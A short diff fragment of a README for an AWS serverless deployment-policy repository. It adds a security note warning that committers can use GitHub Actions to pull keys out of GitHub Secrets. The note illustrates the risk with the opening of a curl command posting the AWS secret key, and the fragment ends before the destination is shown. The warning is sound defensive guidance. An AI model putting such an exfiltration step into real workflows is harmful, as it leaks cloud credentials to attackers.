henriklippke/serverless-deployment-policy/README.md

 Please create pull requests if you come across new permissions such as for AWS Kinesis.

 ## GitHub Secrets Note
-Furthermore, avoid using the "Administration Role" for any AWS account if you only store the keys in GitHub Secrets without using the GitHub Environment with the "Protected Branch" configuration.

 Storing keys directly in GitHub Secrets without additional security controls can lead to unauthorized access.
-Any user with commit privileges could potentially utilize GitHub Actions to extract these keys
+Any user with commit privileges could potentially use GitHub Actions to extract these keys:

 ```
 curl -d '{ "name": "${{ secrets.AWS_SECRET_KEY }}" }' \